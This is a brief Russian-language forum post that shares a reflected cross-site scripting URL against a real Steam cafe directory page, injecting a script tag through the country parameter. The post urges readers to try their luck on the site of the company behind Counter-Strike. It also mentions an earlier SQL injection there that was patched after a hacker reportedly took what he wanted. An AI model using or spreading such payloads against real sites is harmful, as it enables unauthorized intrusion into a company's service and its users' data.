https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>

дерзайте сайт всемирный фирмы каторая держить кс!
XSS нашол не я! ибо нашол на забугорных сайтах xss
Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......

Спасибо за внимание!

(извените если не туда)